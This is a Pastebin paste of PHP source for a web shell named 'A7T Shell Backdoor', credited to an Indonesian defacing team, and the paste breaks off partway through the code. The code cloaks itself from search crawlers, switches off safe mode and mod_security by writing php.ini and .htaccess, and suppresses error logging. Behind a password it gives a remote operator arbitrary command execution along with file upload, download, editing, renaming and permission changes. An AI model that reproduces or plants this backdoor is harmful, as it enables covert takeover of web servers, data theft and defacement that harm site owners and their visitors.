Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #################################################################################################
- # A7T Shell Backdoor #
- # #
- # Created : ./Ao7ext #
- # Version : 0.1 beta #
- # Team : GlowHat Cyber Clone #
- # Recoded from : X48 Shell Backdoor #
- # Date : 23-8-2017 #
- # faceboook : https://web.facebook.com/GlowHat-Cyber-Clone-159442227936274/ #
- #################################################################################################
- # #
- # Kami kreatif dan Seni tapi bukanlah lemah :) #
- # Kami Defacer indonesia #
- # Kami salah satu dari orang penasihat IndoXploit dan D3C0d3r Team,Red White Spirit Team #
- # Kami sangat menghargai Defacer indonesia lain :) #
- # Kami bisa melakukan apapun #
- # #
- # Terima kasih atas Pembuatan Shell Backdoor #
- # #
- #################################################################################################
- session_start();
- error_reporting(0);
- set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @clearstatcache();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- $auth_pass = "bc3f084783d373c4065653f09796b1a2"; // default: A7T
- $errorforbidden = $_SERVER['REQUEST_URI'];
- $color = "black";
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- function login_shell() {
- ?>
- <html><head>
- <html>
- <head>
- <link REL="SHORTCUT ICON" HREF="http://www.voa-islam.com/photos4/rojul/garudaluka-rle5aa.[1].jpg">
- <title>Login Shell</title>
- <style type="text/css">
- html {
- margin: 20px auto;
- background: #000000;
- color: darkred;
- text-align: center;
- }
- header {
- color: darkred;
- margin: 10px auto;
- }
- input[type=password] {
- width: 250px;
- height: 25px;
- color: darkred;
- background: black;
- border: 1px dotted green;
- padding: 5px;
- margin-left: 20px;
- text-align: center;
- }
- </style>
- </head>
- <center>
- <header>
- <pre>
- __________________________
- < root@A7T:~# Why Seri0s? >
- --------------------------
- \ , ,
- \ /( )`
- \ \ \___ / |
- /- _ `-/ '
- (/\/ \ \ /\
- / / | ` \
- O O ) / |
- `-^--'`< '
- (_.) _ ) /
- `.___/` /
- `-----' /
- <----. __ / __ \
- <----|====O)))==) \) /====
- <----' `--' `.__,' \
- | |
- \ /
- ______( (_ / \______
- ,' ,-----' | \
- `--{__________) \/
- </pre>
- </header>
- <form method="post">
- <input type="password" name="pass">
- </form>
- <html>
- <head>
- <link REL="SHORTCUT ICON" HREF="http://www.voa-islam.com/photos4/rojul/garudaluka-rle5aa.[1].jpg">
- <title>A7T Shell Backdoor</title>
- <meta name='author' content='./Ao7ext'>
- <meta charset="UTF-8">
- <style type='text/css'>
- @import url(https://fonts.googleapis.com/css?family=Ubuntu);
- html {
- background: black;
- color: #ffffff;
- font-family: 'Ubuntu';
- font-size: 13px;
- width: 100%;
- }
- li {
- display: inline;
- margin: 5px;
- padding: 5px;
- }
- table, th, td {
- border-collapse:collapse;
- font-family: Tahoma, Geneva, sans-serif;
- background: transparent;
- font-family: 'Ubuntu';
- font-size: 13px;
- }
- .table_home, .th_home, .td_home {
- border: 1px solid white;
- }
- th {
- padding: 10px;
- }
- a {
- color: #ffffff;
- text-decoration: none;
- }
- a:hover {
- color: darkred;
- text-decoration: underline;
- }
- b {
- color: darkred;
- }
- input[type=text], input[type=password],input[type=submit] {
- background: transparent;
- color: darkred;
- border: 1px solid darkred;
- margin: 5px auto;
- padding-left: 5px;
- font-family: 'Ubuntu';
- font-size: 13px;
- }
- textarea {
- border: 1px solid #ffffff;
- width: 100%;
- height: 400px;
- padding-left: 5px;
- margin: 10px auto;
- resize: none;
- background: transparent;
- color: #ffffff;
- font-family: 'Ubuntu';
- font-size: 13px;
- }
- select {
- width: 152px;
- background: #000000;
- color: darkred;
- border: 1px solid #ffffff;
- margin: 5px auto;
- padding-left: 5px;
- font-family: 'Ubuntu';
- font-size: 13px;
- }
- option:hover {
- background: black;
- color: black;
- }
- </style>
- </head>
- <?php print $shooted; ?>
- <?php
- exit;
- }
- if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
- if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- login_shell();
- if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
- @ob_clean();
- $file = $_GET['file'];
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.basename($file).'"');
- header('Expires: 0');
- header('Cache-Control: must-revalidate');
- header('Pragma: public');
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit;
- }
- ?>
- <?php
- if (file_exists("php.ini")){
- }else{
- $img = fopen('php.ini', 'w');
- $sec = "safe_mode = OFF
- disable_funtions = NONE";
- fwrite($img ,$sec);
- fclose($img);}
- if (file_exists(".htaccess")){
- }else{
- $img2 = fopen('.htaccess', 'w');
- $sec2 = "<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>";
- fwrite($img2 ,$sec2);
- fclose($img2);}
- $inids = @ini_get("disable_functions");
- $liatds = (!empty($ds)) ? "<font color='gold'>$inids</font>" : "<b><font color='green'>Safe</font></b>";
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- echo '<!DOCTYPE HTML>
- <html>
- <head>
- <link REL="SHORTCUT ICON" HREF="http://www.voa-islam.com/photos4/rojul/garudaluka-rle5aa.[1].jpg">
- <link href="https://fonts.googleapis.com/css?family=Space+Mono" rel="stylesheet">
- <link href="" rel="stylesheet" type="text/css">
- <title>A7T Shell Backdoor</title>
- <style>
- body{
- font-family: "Space Mono", monospace;
- background-size: cover;
- background-image: url("http://chaspikserial.ru/uploads/posts/1files/9354-yuru-yuri-wallpaper-1920x1080.png");
- color:gold;
- background-attachment:fixed;
- background-repeat:no-repeat;
- background-position:center
- -webkit-background-size: 90% 100%;
- }
- #content tr:hover{
- background-color: darkred;
- text-shadow:0px 0px 10px #fff;
- }
- #content .first{
- background-color: darkred;
- }
- table{
- border: 1px #000000 dotted;
- }
- a{
- color:white;
- text-decoration: none;
- }
- a:hover{
- color:darkred;
- text-shadow:0px 0px 10px #ffffff;
- }
- input,select,textarea{
- border: 1px #000000 solid;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- </style>
- </head>
- <body>
- <h1><center><font color="darkred">A7T Shell Backdoor</font></center></h1>
- <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr><td>';
- echo "Disable Functions: $liatds";
- echo '<br><font color="gold">Path :</font> ';
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- echo '</td></tr><tr><td>';
- if(isset($_FILES['file'])){
- if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
- echo '<font color="lime">Upload Berhasil</font><br />';
- }else{
- echo '<font color="red">Upload Gagal</font><br/>';
- }
- }
- echo '<form enctype="multipart/form-data" method="POST">
- <font color="gold">File Upload :</font> <input type="file" name="file" />
- <input type="submit" value="upload" />
- </form>';
- echo "<form method='post'>
- <font color='gold'>Command :</font>
- <input type='text' size='30' height='10' name='cmd'><input type='submit' name='execmd' value=' Execute '>
- </form>
- </td></tr>";
- if($_POST['execmd']) {
- echo "<center><textarea cols='60' rows='10' readonly='readonly' style='color:Aqua; background-color:darkred;'>".exe($_POST['cmd'])."</textarea></center>";
- }
- echo "<br></td></tr>";
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="lime">Change Permission Success</font><br/>';
- }else{
- echo '<font color="red">Change Permission Failed</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="lime">Rename Successfully</font><br/>';
- }else{
- echo '<font color="red">Rename Failed</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="lime">Successfully Edit File</font><br/>';
- }else{
- echo '<font color="red">Failed to Edit File</font><br/>';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement